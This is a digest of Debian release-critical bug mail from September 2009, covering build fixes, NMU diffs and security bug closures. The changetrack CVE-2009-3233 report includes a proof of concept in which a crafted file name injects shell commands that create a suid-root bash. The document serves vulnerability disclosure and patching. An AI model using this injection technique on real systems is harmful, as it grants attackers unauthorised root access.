tags 533983 + patch thanks Dear maintainer, I've prepared an NMU for hdate-applet (versioned as 0.15.10-2.1) and will upload it to DELAYED/7 on Sep, 21 (you have ~10 days to cancel it with a new upload). Regards. diff -u hdate-applet-0.15.10/debian/rules hdate-applet-0.15.10/debian/rules --- hdate-applet-0.15.10/debian/rules +++ hdate-applet-0.15.10/debian/rules @@ -5,6 +5,8 @@ include /usr/share/cdbs/1/class/gnome.mk DEB_CONFIGURE_EXTRA_FLAGS := --without-systray +export CFLAGS += -I/usr/include/libgnomeui-2.0 + clean:: rm -f po/*.gmo config.log hdate-applet.server po/Makefile.in po/POTFILES chmod +x mkinstalldirs diff -u hdate-applet-0.15.10/debian/changelog hdate-applet-0.15.10/debian/changelog --- hdate-applet-0.15.10/debian/changelog +++ hdate-applet-0.15.10/debian/changelog @@ -1,3 +1,11 @@ +hdate-applet (0.15.10-2.1) unstable; urgency=low + + * Non-maintainer upload. + * debian/rules: add library search path to CFLAGS, fixes FTBFS +(Closes: #533983) + + -- David Paleino d.pale...@gmail.com Fri, 18 Sep 2009 00:01:47 +0200 + hdate-applet (0.15.10-2) unstable; urgency=low * Fix FTBFS due to missing execute permissions on mkinstalldirs. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: hdate-applet: diff for NMU version 0.15.10-2.1
Processing commands for cont...@bugs.debian.org: tags 533983 + patch Bug #533983 [gnome-swallow] gnome-swallow: FTBFS: gnome-swallow.c:23:36: error: libgnomeui/gnome-about.h: No such file or directory Added tag(s) patch. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: marked as done (CVE-2009-3233: shell command injection via filename)
Your message dated Thu, 17 Sep 2009 22:18:08 + with message-id e1mopim-0007a9...@ries.debian.org and subject line Bug#546791: fixed in changetrack 4.5-2 has caused the Debian Bug report #546791, regarding CVE-2009-3233: shell command injection via filename to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: changetrack Version: 4.3-3 Severity: grave Tags: security Justification: user security hole -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores) Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages changetrack depends on: ii libfile-ncopy-perl0.34-1 file copying like cp for perl ii perl 5.10.0-19 Larry Wall's Practical Extraction Versions of packages changetrack recommends: ii cron 3.0pl1-105 management of regular background p ii ed0.7-3 The classic unix line editor changetrack suggests no packages. -- no debconf information Its is posible, to run commands as root, if you have permision to create files in directory chcked via changetrack, example: mkdir /etc/test touch /etc/test/sth echo commmand u like most cd .. cd .. cd .. cd .. cd bin cp bash bash.ultimate chmod ug+s bash.ultimate echo /etc/test/* /etc/changetrack.conf wait for /etc/cron.hourly/changetrack # ls -al /bin/bash.ultimate -rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate bash.ultimate -p ;) Probably changetrack shudnot use shell commands, or escape sh special haracters like spaces enters ; etc... -- Regards Marek Grzybowski ---End Message--- ---BeginMessage--- Source: changetrack Source-Version: 4.5-2 We believe that the bug you reported is fixed in the latest version of changetrack, which is due to be installed in the Debian FTP archive: changetrack_4.5-2.diff.gz to pool/main/c/changetrack/changetrack_4.5-2.diff.gz changetrack_4.5-2.dsc to pool/main/c/changetrack/changetrack_4.5-2.dsc changetrack_4.5-2_all.deb to pool/main/c/changetrack/changetrack_4.5-2_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 546...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jens Peter Secher j...@debian.org (supplier of updated changetrack package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Thu, 17 Sep 2009 22:32:43 +0200 Source: changetrack Binary: changetrack Architecture: source all Version: 4.5-2 Distribution: unstable Urgency: low Maintainer: Jens Peter Secher j...@debian.org Changed-By: Jens Peter Secher j...@debian.org Description: changetrack - monitor changes to (configuration) files Closes: 546791 Changes: changetrack (4.5-2) unstable; urgency=low . * [reject-weird-filenames.diff] Fix possible local exploit by rejecting filenames with unsafe characters (cf. CVE-2009-3233). Thanks to Marek Grzybowski and Andrzej Lemieszek. (Closes: #546791) Checksums-Sha1: 3f8c484862fe780799cb222e9e167060f816380d 1203 changetrack_4.5-2.dsc dd2276879e4e4978bcd8719305257883110c283b 13966 changetrack_4.5-2.diff.gz bd6371b033eb49bb87c3671c6c8a62df1331f0b0 22160 changetrack_4.5-2_all.deb Checksums-Sha256: 66ae538c9a129c6cde8d5030a367990d885cc2f8e340641fb2fabd5d649264c3 1203 changetrack_4.5-2.dsc 8c43f60545ad78d1c42605f7e507121c4e2d607d0bf280cbd56c518a0ceb1343 13966 changetrack_4.5-2.diff.gz e25d8c2c03e2a821025b9afe3da60dcd4e13d8827420f315ab898c891c7ee0d4 22160 changetrack_4.5-2_all.deb Files: 6453dd7fb96ed8f2cc5cf00b6a4e305a 1203 utils optional changetrack_4.5-2.dsc 28ed49102de02d769d67315616be21d0 13966 utils optional changetrack_4.5-2.diff.gz 489f18c7e76e6f00db07691d0ad178ef 22160 utils optional changetrack_4.5-2_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10rc1 (GNU/Linux) iJwEAQECAAYFAkqynasACgkQiFVdEFPVQL/C1AQAw56DBodzOh/hxvp9I3bBMi39
Bug#521942: jabsorb: diff for NMU version 1.3-1.1
Dear maintainer, I've prepared an NMU for jabsorb (versioned as 1.3-1.1) and am going to upload it to DELAYED/7 on Sep, 21 (you then have ~10days to do an upload and cancel the NMU). Regards. diff -u jabsorb-1.3/debian/control jabsorb-1.3/debian/control --- jabsorb-1.3/debian/control +++ jabsorb-1.3/debian/control @@ -2,7 +2,7 @@ Section: libs Priority: optional Maintainer: Kalle Kivimaa kil...@debian.org -Build-Depends: debhelper (= 5), cdbs, default-jdk-builddep, ant, maven-ant-helper, libslf4j-java, dpatch +Build-Depends: debhelper (= 5), cdbs, default-jdk-builddep, ant, maven-ant-helper, libslf4j-java, dpatch, libservlet2.3-java, libcommons-httpclient-java Standards-Version: 3.8.0 Homepage: http://jabsorb.org diff -u jabsorb-1.3/debian/changelog jabsorb-1.3/debian/changelog --- jabsorb-1.3/debian/changelog +++ jabsorb-1.3/debian/changelog @@ -1,3 +1,12 @@ +jabsorb (1.3-1.1) unstable; urgency=low + + * Non-maintainer upload. + * Adding missing Build-Depends on libservlet2.3-java and +libcommons-httpclient-java, thanks to Damien Raude-Morvan +(Closes: #521942) + + -- David Paleino d.pale...@gmail.com Fri, 18 Sep 2009 00:52:13 +0200 + jabsorb (1.3-1) unstable; urgency=low * Initial release (Closes: #503305). -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546502: marked as done (cryptmount: Incorrect dependencies in init.d script)
Your message dated Thu, 17 Sep 2009 22:47:37 + with message-id e1moplj-0001ui...@ries.debian.org and subject line Bug#546502: fixed in cryptmount 4.0.1-1 has caused the Debian Bug report #546502, regarding cryptmount: Incorrect dependencies in init.d script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 546502: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546502 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: cryptmount Version: 1.1-2 Severity: serious Tags: patch User: initscripts-ng-de...@lists.alioth.debian.org Usertags: incorrect-dependency With dependency based boot sequencing, I discovered what I believe is a bug in the init.d script. The scripts uses files in /usr/, but do not depend on $remote_fs. Also, the cryptmount-early script starts in rcS.d but depend on $syslog. This is an impossible dependency, as the syslog collector is started in runlevels 2-5 after rcS.d/ is complete. Finally, I suspect the cryptmount script expect the cryptmount-early script to run before it, and this relationship should be explicitly stated to make sure concurrent booting work as expected. URL: http://refspecs.freestandards.org/LSB_2.1.0/LSB-generic/LSB-generic/initscrcomconv.html documents the LSB header format. Some debian notes are available from URL: http://wiki.debian.org/LSBInitScripts . This patch should fix the issues. Setting severity serious as the script will fail to work if /usr/ is on a separate partition, not yet mounted when the scripts are executed too early during boot. diff -ur cryptmount-4.0/initscript-early.in cryptmount-4.0-pere/initscript-early.in --- cryptmount-4.0/initscript-early.in 2009-05-04 08:07:28.0 +0200 +++ cryptmount-4.0-pere/initscript-early.in 2009-09-13 19:51:43.0 +0200 @@ -6,10 +6,8 @@ # Basic support for Linux Standard Base: ### BEGIN INIT INFO # Provides: cryptmount-early -# Required-Start: $syslog -# Required-Stop:$syslog -# Should-Start: $local_fs -# Should-Stop: $local_fs +# Required-Start: $remote_fs +# Required-Stop:$remote_fs # Default-Start:S # Default-Stop:0 6 # Short-Description:setup encrypted devices at boot diff -ur cryptmount-4.0/initscript.in cryptmount-4.0-pere/initscript.in --- cryptmount-4.0/initscript.in2009-05-04 08:07:28.0 +0200 +++ cryptmount-4.0-pere/initscript.in 2009-09-13 19:53:57.0 +0200 @@ -6,10 +6,8 @@ # Basic support for Linux Standard Base: ### BEGIN INIT INFO # Provides: cryptmount -# Required-Start: $syslog -# Required-Stop:$syslog -# Should-Start: $local_fs -# Should-Stop: $local_fs +# Required-Start: $remote_fs $syslog cryptmount-early +# Required-Stop:$remote_fs $syslog cryptmount-early # Default-Start:2 3 4 5 # Default-Stop:0 1 6 # Short-Description:setup encrypted filesystems/swap at boot Happy hacking, -- Petter Reinholdtsen ---End Message--- ---BeginMessage--- Source: cryptmount Source-Version: 4.0.1-1 We believe that the bug you reported is fixed in the latest version of cryptmount, which is due to be installed in the Debian FTP archive: cryptmount_4.0.1-1.diff.gz to pool/main/c/cryptmount/cryptmount_4.0.1-1.diff.gz cryptmount_4.0.1-1.dsc to pool/main/c/cryptmount/cryptmount_4.0.1-1.dsc cryptmount_4.0.1-1_amd64.deb to pool/main/c/cryptmount/cryptmount_4.0.1-1_amd64.deb cryptmount_4.0.1.orig.tar.gz to pool/main/c/cryptmount/cryptmount_4.0.1.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 546...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. RW Penney rwpen...@users.sourceforge.net (supplier of updated cryptmount package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Mon, 14 Sep 2009 20:00:00 + Source: cryptmount Binary: cryptmount Architecture: source amd64 Version: 4.0.1-1 Distribution: unstable Urgency: low Maintainer: RW Penney rwpen...@users.sourceforge.net Changed-By: RW Penney rwpen...@users.sourceforge.net Description: cryptmount - Management of encrypted file systems Closes: 546502 Changes:
Bug#547253: sane-utils: sane seems to be compiled without support for libusb
Package: sane-utils Version: 1.0.19-23 Severity: grave Justification: renders package unusable -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.27.12 (PREEMPT) Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages sane-utils depends on: ii adduser 3.110 add and remove users and groups ii debconf [debconf-2.0] 1.5.24 Debian configuration management sy ii libavahi-client3 0.6.23-3lenny1 Avahi client library ii libavahi-common3 0.6.23-3lenny1 Avahi common library ii libc6 2.7-18 GNU C Library: Shared libraries ii libieee1284-3 0.2.11-5 cross-platform library for paralle ii libsane 1.0.19-23 API library for scanners ii libusb-0.1-4 2:0.1.12-13userspace USB programming library ii update-inetd 4.31 inetd configuration file updater Versions of packages sane-utils recommends: ii avahi-daemon 0.6.23-3lenny1 Avahi mDNS/DNS-SD daemon Versions of packages sane-utils suggests: pn unpaper none (no description available) -- debconf information excluded Sane is not able to detect usb-scanners with the current debian kernel 2.6.26 and later kernels. sane-find-scanner does search usbscanners only using devicenames like /dev/scanner, /dev/scanner0 etc. It does not report to try searching the scanner via libusb (since kernel version 2.6.4 the usbscanner module has been removed from the kernel and libusb is used insted). The sane manualpage says that the libusb headerfiles (libusb-dev) must be present when compiling sane in order to make sane able to use libusb. I downloadet the original sane sourcecode and compiled it with libusb-dev intsalled. The resulting sane-find-scanner worked correctly and found my scanner via libusb and xscanimage does also found the scanner. It seems that libusb-dev was not installed when the current sane packages where build. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: found 545641 in 1.0+svn834-3
Processing commands for cont...@bugs.debian.org:
found 545641 1.0+svn834-3
Bug #545641 {Done: Samuel Thibault sthiba...@debian.org} [vite] vite: FTBFS:
Nonexistent build-dependency: freeglut-dev
There is no source info for the package 'vite' at version '1.0+svn834-3' with
architecture ''
Unable to make a source version for version '1.0+svn834-3'
Bug Marked as found in versions 1.0+svn834-3; no longer marked as fixed in
versions vite/1.0+svn834-3 and reopened.
End of message, stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: changetrack: shell command injection via filename
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Marek Grzybowski pisze:
Jens Peter Secher wrote:
2009/9/17 Marek Grzybowski marek.grzybow...@atm.com.pl:
(...)
Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs
should be safe to:
His patch:
[...]
+my $realfile_esc = escape_shell_chars ($realfile);
[...]
- `cp $realfile $compfile`;
+ `cp $realfile_esc $compfile_esc`;
[...]
+sub escape_shell_chars
+{
+my $arg = shift;
+$arg =~ s/[;\*\|`\$!#\(\)\[\]\{\}:'\s]/\\$/g;
+return $arg;
+}
This is not going work. When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc. I will go for the solution of rejecting weird file
names.
You right Jeans, it's no good enought witch enters,
I also chcked ./bashline.c in bash sources:
/* characters that need to be quoted when appearing in filenames. */
rl_filename_quote_characters = \t\n\\\'@=;|()#$`?*[!:{;/*}*/
i do some tests, and come up witch this :
Yeah, Marku, you are right. I didn't test my patch with newline characters (I
used semicolons for
testing your exploit), so I didn't notice that newline is a special case of
special characters
(see bash(1), section QUOTING) and can't be easly quoted using backslash
Your solution using single quotes is much better ( it smartly overrides the
limitation of single
quotes - that inside single quoted string single quotes can't be escaped), In
the shorter form it
can look like this:
sub escape_shell_chars
{
my $arg = shift;
$arg =~ s/'/'\\''/g;
return '$arg';
}
- --
Andrzej Lemieszek
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
iGUEARECACUFAkqy03keGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/eGUAn38bCS8TccE82Tg2VZ+beXhIfIpQAJ9q4FO4jF0GxOCXT67Z
KHqOeLq8gQ==
=wiP3
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#540379: marked as done (memcached: CVE-2009-2415 heap-based buffer overflow in length processing)
Your message dated Fri, 18 Sep 2009 01:02:04 + with message-id e1morrq-0004lo...@ries.debian.org and subject line Bug#540379: fixed in memcached 1.4.1-1 has caused the Debian Bug report #540379, regarding memcached: CVE-2009-2415 heap-based buffer overflow in length processing to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 540379: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=540379 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: memcached Version: 1.2.8-2 Severity: grave Tags: security Hi, the following CVE (Common Vulnerabilities Exposures) id was published for memcached. CVE-2009-2415[0]: | Ronald Volgers discovered that memcached, a high-performance memory object | caching system, is vulnerable to several heap-based buffer overflows due | to integer conversions when parsing certain length attributes. An | attacker can use this to execute arbitrary code on the system running | memcached (on etch with root privileges). If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://lists.debian.org/debian-security-announce/2009/msg00169.html http://security-tracker.debian.net/tracker/CVE-2009-2415 -- Nico Golde - http://www.ngolde.de - n...@jabber.ccc.de - GPG: 0xA0A0 For security reasons, all text in this mail is double-rot13 encrypted. pgp75N40IRRfR.pgp Description: PGP signature ---End Message--- ---BeginMessage--- Source: memcached Source-Version: 1.4.1-1 We believe that the bug you reported is fixed in the latest version of memcached, which is due to be installed in the Debian FTP archive: memcached_1.4.1-1.diff.gz to pool/main/m/memcached/memcached_1.4.1-1.diff.gz memcached_1.4.1-1.dsc to pool/main/m/memcached/memcached_1.4.1-1.dsc memcached_1.4.1-1_amd64.deb to pool/main/m/memcached/memcached_1.4.1-1_amd64.deb memcached_1.4.1.orig.tar.gz to pool/main/m/memcached/memcached_1.4.1.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 540...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. David Martínez Moreno en...@debian.org (supplier of updated memcached package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Fri, 18 Sep 2009 02:43:54 +0200 Source: memcached Binary: memcached Architecture: source amd64 Version: 1.4.1-1 Distribution: unstable Urgency: high Maintainer: David Martínez Moreno en...@debian.org Changed-By: David Martínez Moreno en...@debian.org Description: memcached - A high-performance memory object caching system Closes: 540379 545883 Changes: memcached (1.4.1-1) unstable; urgency=high . * New upstream release (closes: #545883): - Finally addressed CVE-2009-2415: heap-based buffer overflow in length processing (closes: #540379). - Boundary condition during pipelined decoding caused crash. - Bad initialization during buffer realloc. - Buffer overrun in stats_prefix_find. - Other fixes and cleanups. * Changed the default start to yes in /etc/init.d/memcached as well. * debian/watch updated with new format and URL in code.google.com. Thanks, Monty Taylor. * Added get-orig-source target, thanks to Monty Taylor. * debian/control: - Upgraded Standards-Version to 3.8.3 (no changes). - Added Suggests: libmemcached. - Bumped debhelper dependency and debian/compat to 6. - Added Depends on quilt 0.46-7 in order to use dh_quilt_* helpers. * debian/rules: Added dh_quilt_* helpers. * Added direct patches to source as quilt patches. * debian/README.source: Created such file to shut up lintian pedantic. Checksums-Sha1: aab0e0da8cdae5e69478e0e8f00f3f942d82a45b 1040 memcached_1.4.1-1.dsc 6acf8941c494edb4f19efc402b844a494608b679 277221 memcached_1.4.1.orig.tar.gz 62f8b28604632655c56ba776ca5635d11fa5efd6 7603 memcached_1.4.1-1.diff.gz 4810ced32158a93ea2c2e076173304c2cffb9fbb 75012 memcached_1.4.1-1_amd64.deb Checksums-Sha256: 023c3ed8bbf6501d2601dd4dc47926b6d8433ee67326389eb5e753f9f2f35246 1040 memcached_1.4.1-1.dsc 6bb6e52290bbe987990e83d57856f762402c9a625e9c4f8da785dc7f53acbd83 277221 memcached_1.4.1.orig.tar.gz
Bug#545641: marked as done (vite: FTBFS: Nonexistent build-dependency: freeglut-dev)
Your message dated Fri, 18 Sep 2009 00:47:07 + with message-id e1morcx-0003ki...@ries.debian.org and subject line Bug#545641: fixed in vite 1.0+svn834-4 has caused the Debian Bug report #545641, regarding vite: FTBFS: Nonexistent build-dependency: freeglut-dev to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 545641: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=545641 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: vite Version: 1.0+svn834-2 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090907 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: ** Using build dependencies supplied by package: Build-Depends: debhelper (= 7), libqt4-dev, libqt4-opengl, libqt4-opengl-dev, freeglut-dev, texlive-latex-base, texlive-latex-recommended, texlive-latex-extra, texlive-fonts-recommended, ghostscript ┌──┐ │ Install build dependencies │ └──┘ Checking for already installed source dependencies... W: Unable to locate package freeglut-dev debhelper: missing Using default version 7.4.1 libqt4-dev: missing libqt4-opengl: missing libqt4-opengl-dev: missing freeglut-dev: missing texlive-latex-base: missing texlive-latex-recommended: missing texlive-latex-extra: missing texlive-fonts-recommended: missing ghostscript: missing Checking for source dependency conflicts... E: Couldn't find package freeglut-dev The full build log is available from: http://people.debian.org/~lucas/logs/2009/09/07/vite_1.0+svn834-2_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: vite Source-Version: 1.0+svn834-4 We believe that the bug you reported is fixed in the latest version of vite, which is due to be installed in the Debian FTP archive: vite_1.0+svn834-4.diff.gz to pool/main/v/vite/vite_1.0+svn834-4.diff.gz vite_1.0+svn834-4.dsc to pool/main/v/vite/vite_1.0+svn834-4.dsc vite_1.0+svn834-4_amd64.deb to pool/main/v/vite/vite_1.0+svn834-4_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 545...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Samuel Thibault sthiba...@debian.org (supplier of updated vite package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Fri, 18 Sep 2009 02:23:35 +0200 Source: vite Binary: vite Architecture: source amd64 Version: 1.0+svn834-4 Distribution: unstable Urgency: low Maintainer: Samuel Thibault sthiba...@debian.org Changed-By: Samuel Thibault sthiba...@debian.org Description: vite - Efficient visual trace explorer Closes: 545641 Changes: vite (1.0+svn834-4) unstable; urgency=low . * control: Really replace freeglut-dev Build-dependency with freeglut3-dev (Closes: Bug#545641). Checksums-Sha1: 04ceb7ca415f1d5499e36e905aa29dca24cd3448 1302 vite_1.0+svn834-4.dsc 8d7f72d42246c524cbeb459f0bab01201c8a112f 2823 vite_1.0+svn834-4.diff.gz 8702694294c9c3e74b8ab76f55e776ef3574f2bd 1564608 vite_1.0+svn834-4_amd64.deb Checksums-Sha256: 8a1f0d996918317411ffe8ccce907f07037b662ed466e7cbaf6f382d6f8b 1302 vite_1.0+svn834-4.dsc 9b2e43ae511c6c050c079bb3a381cd3c12564456373d2aa667c7222a81bf2d88 2823 vite_1.0+svn834-4.diff.gz 6cd0ec8b71cea029a8a37ada55e7c0f00fa6f42f3ef01e24e8f1763a3f6fb2f1 1564608 vite_1.0+svn834-4_amd64.deb Files: f06c390eaf6323349fab335a3bb4519f 1302 devel optional vite_1.0+svn834-4.dsc 87513f6af5af289f6ef05d0dc9cf38eb 2823 devel optional vite_1.0+svn834-4.diff.gz
Bug#547262: FTFBS: version check of python
Package: libmei Version: 1.0.0-1 Severity: serious Justification: FTFBS Hi, libmei FTFBS on some architecture. https://buildd.debian.org/pkg.cgi?pkg=libmei - checking for stdio.h... yes checking for an ANSI C-conforming const... yes checking for size_t... yes checking for working strtod... yes checking for memset... yes checking for pow... yes checking for swig... /usr/bin/swig checking for swig... (cached) /usr/bin/swig checking for SWIG version... 1.3.39 configure: SWIG executable is '/usr/bin/swig' configure: SWIG library directory is '/usr/share/swig1.3' checking for python... no checking whether no version = 2.5... configure: error: too old make: *** [config.status] Error 1 dpkg-buildpackage: error: debian/rules build gave error exit status 2 - Please check and fix. Best regards, Nobuhiro -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686-bigmem (SMP w/2 CPU cores) Locale: LANG=ja_JP.UTF-8, LC_CTYPE=ja_JP.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#521958: marked as done (lash: FTBFS: 'NI_MAXHOST' undeclared)
Your message dated Fri, 18 Sep 2009 04:03:33 +
with message-id e1mouh3-0008qb...@ries.debian.org
and subject line Bug#521958: fixed in lash 0.5.4-2
has caused the Debian Bug report #521958,
regarding lash: FTBFS: 'NI_MAXHOST' undeclared
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
521958: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=521958
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: lash
Version: 0.5.4-1
Severity: serious
From my pbuilder build log:
...
/bin/sh ../libtool --tag=CC --mode=compile cc -DHAVE_CONFIG_H -I. -I. -I..
-I.. -DLASH_BUILD -
DHAVE_LASH -g -O2 -g -Wall -O2 -c -o liblash_la-socket.lo `test -f 'socket.c'
|| echo './'`socket.c
cc -DHAVE_CONFIG_H -I. -I. -I.. -I.. -DLASH_BUILD -DHAVE_LASH -g -O2 -g -Wall
-O2 -c socket.c -fPIC -
DPIC -o .libs/liblash_la-socket.o
In file included from ../lash/list.h:37,
from socket.c:36:
../lash/xmalloc.h: In function 'lash_strdup':
../lash/xmalloc.h:51: warning: implicit declaration of function 'strdup'
../lash/xmalloc.h:51: warning: incompatible implicit declaration of built-in
function 'strdup'
socket.c: In function 'lash_lookup_peer_name':
socket.c:266: error: 'NI_MAXHOST' undeclared (first use in this function)
socket.c:266: error: (Each undeclared identifier is reported only once
socket.c:266: error: for each function it appears in.)
socket.c:266: warning: unused variable 'host'
socket.c: In function 'lash_lookup_peer_port':
socket.c:279: error: 'NI_MAXSERV' undeclared (first use in this function)
socket.c:279: warning: unused variable 'port'
make[3]: *** [liblash_la-socket.lo] Error 1
make[3]: Leaving directory
`/tmp/buildd/lash-0.5.4/build-tree/lash-0.5.4/liblash'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/tmp/buildd/lash-0.5.4/build-tree/lash-0.5.4'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/tmp/buildd/lash-0.5.4/build-tree/lash-0.5.4'
make: *** [debian/stamp-makefile-build] Error 2
--
Daniel Schepler
---End Message---
---BeginMessage---
Source: lash
Source-Version: 0.5.4-2
We believe that the bug you reported is fixed in the latest version of
lash, which is due to be installed in the Debian FTP archive:
lash-bin_0.5.4-2_i386.deb
to pool/main/l/lash/lash-bin_0.5.4-2_i386.deb
lash-doc_0.5.4-2_all.deb
to pool/main/l/lash/lash-doc_0.5.4-2_all.deb
lash_0.5.4-2.diff.gz
to pool/main/l/lash/lash_0.5.4-2.diff.gz
lash_0.5.4-2.dsc
to pool/main/l/lash/lash_0.5.4-2.dsc
lashd_0.5.4-2_i386.deb
to pool/main/l/lash/lashd_0.5.4-2_i386.deb
liblash-dev_0.5.4-2_i386.deb
to pool/main/l/lash/liblash-dev_0.5.4-2_i386.deb
liblash2_0.5.4-2_i386.deb
to pool/main/l/lash/liblash2_0.5.4-2_i386.deb
python-lash_0.5.4-2_i386.deb
to pool/main/l/lash/python-lash_0.5.4-2_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 521...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Barry deFreese bdefre...@debian.org (supplier of updated lash package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.8
Date: Thu, 17 Sep 2009 22:28:25 -0400
Source: lash
Binary: liblash-dev lashd lash-bin liblash2 lash-doc python-lash
Architecture: source all i386
Version: 0.5.4-2
Distribution: unstable
Urgency: low
